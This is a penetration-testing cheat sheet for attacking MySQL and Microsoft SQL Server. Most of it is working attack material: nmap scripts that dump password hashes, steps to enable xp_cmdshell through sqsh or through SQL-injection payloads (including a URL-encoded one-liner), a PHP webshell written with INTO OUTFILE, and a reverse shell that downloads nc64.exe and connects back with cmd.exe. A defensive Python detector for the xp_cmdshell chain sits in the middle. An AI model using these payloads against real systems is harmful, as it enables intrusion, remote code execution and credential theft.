MYSQL (3306)
1. Basics
Scanning (nmap service detection plus the MySQL NSE scripts)
sudo nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 <IP>
Initiate connection
mysql -h <IP> -u <username> -p<pass> [-P <port>]    # no space after -p, otherwise the next word is taken as the database name
sqsh -S <IP> -U <username> -P <password> -D <database>    # MSSQL / TDS client, not MySQL
For Windows MSSQL instances, authenticating with domain credentials
impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth
2. Reverse Shell
1. Initiate connection with sqsh (the xp_cmdshell steps below apply to Microsoft SQL Server only; the mysql client cannot run them)
# In sqsh, type GO on its own line after each query to send it
Run the commands one at a time:
# List which principals hold permissions on xp_cmdshell
USE master
EXEC sp_helprotect 'xp_cmdshell'
# Check whether xp_cmdshell is enabled (value_in_use = 1 means enabled)
SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';
# Turn on advanced options; required before xp_cmdshell can be configured
EXEC sp_configure 'show advanced options', 1
RECONFIGURE
# Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1
RECONFIGURE
# Test command execution
EXEC master..xp_cmdshell 'whoami'
Manual code execution through SQL injection:
Steps to enable `xp_cmdshell` (each line is a separate stacked query injected into the vulnerable parameter)
'; EXEC sp_configure "show advanced options", 1; -- //
'; RECONFIGURE; -- //
'; EXEC sp_configure "xp_cmdshell", 1; -- //
'; RECONFIGURE; -- //
'; EXEC xp_cmdshell "whoami"; -- //
Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //
URL encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F
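Defender-side counterpart to the enablement sequence above and to its URL-encoded injection form: an added Python example (not part of the original notes) that flags the show-advanced-options / enable / execute chain in constructed audit-log lines and URL-decodes web requests so the injected variant is caught by the same patterns. The log format, logins and lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in a simplified "<time> <login> <statement>" audit format (not real data).
SAMPLE_LOG = [
    "10:00:01 app_user SELECT name FROM sys.tables",
    "10:00:05 app_user EXEC sp_configure 'show advanced options', 1",
    "10:00:06 app_user RECONFIGURE",
    "10:00:08 app_user EXEC sp_configure 'xp_cmdshell', 1",
    "10:00:09 app_user RECONFIGURE",
    "10:00:12 app_user EXEC master..xp_cmdshell 'whoami'",
    "10:05:00 web_user GET /item?id=%27%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20--",
    "10:05:01 dba_user SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell'",
]

# One pattern per stage of the xp_cmdshell enablement chain; case-insensitive, either quote style.
STAGES = {
    "advanced_options": re.compile(r"sp_configure\s+['\"]show\s+advanced\s+options['\"]\s*,\s*['\"]?\s*1", re.I),
    "xp_cmdshell_enabled": re.compile(r"sp_configure\s+['\"]xp_cmdshell['\"]\s*,\s*['\"]?\s*1", re.I),
    # Execution: xp_cmdshell invoked via EXEC/EXECUTE (optionally master..) or as a stacked statement.
    "xp_cmdshell_exec": re.compile(r"(?:exec(?:ute)?\s+(?:master\s*\.\.\s*)?|;\s*)xp_cmdshell\b", re.I),
}

def normalize(statement):
    """URL-decode twice so a payload injected through a web parameter (possibly double-encoded)
    matches the same patterns as a statement typed at a SQL client."""
    return unquote(unquote(statement))

def classify(statement):
    """Return the list of chain stages present in one statement (empty for benign queries)."""
    text = normalize(statement)
    return [name for name, pat in STAGES.items() if pat.search(text)]

def scan(lines):
    """Return (stages seen per login, alerts). Every stage is alerted, since enabling
    xp_cmdshell is a configuration change worth reviewing on its own; a HIGH alert is
    added when the same login both enabled and then executed xp_cmdshell."""
    seen, alerts = {}, []
    for line in lines:
        ts, login, stmt = line.split(" ", 2)
        for stage in classify(stmt):
            seen.setdefault(login, []).append(stage)
            alerts.append(f"{ts} {login}: {stage}")
            if stage == "xp_cmdshell_exec" and "xp_cmdshell_enabled" in seen[login]:
                alerts.append(f"{ts} {login}: HIGH xp_cmdshell enabled and executed by the same login")
    return seen, alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG)[1]:
        print(alert)
```

The benign dba_user query that merely reads sys.configurations produces no alert, while the URL-encoded web request is flagged as an enable attempt.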
Payload Example:
Write a webshell into the web root (MySQL; appended to a UNION SELECT injection, so the number of columns must match the original query, and it requires the FILE privilege and a secure_file_priv setting that permits writing to that path) -
"<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"
Initiating a reverse shell with nc64.exe through the injected webshell (each command is passed via the cmd parameter) -
curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>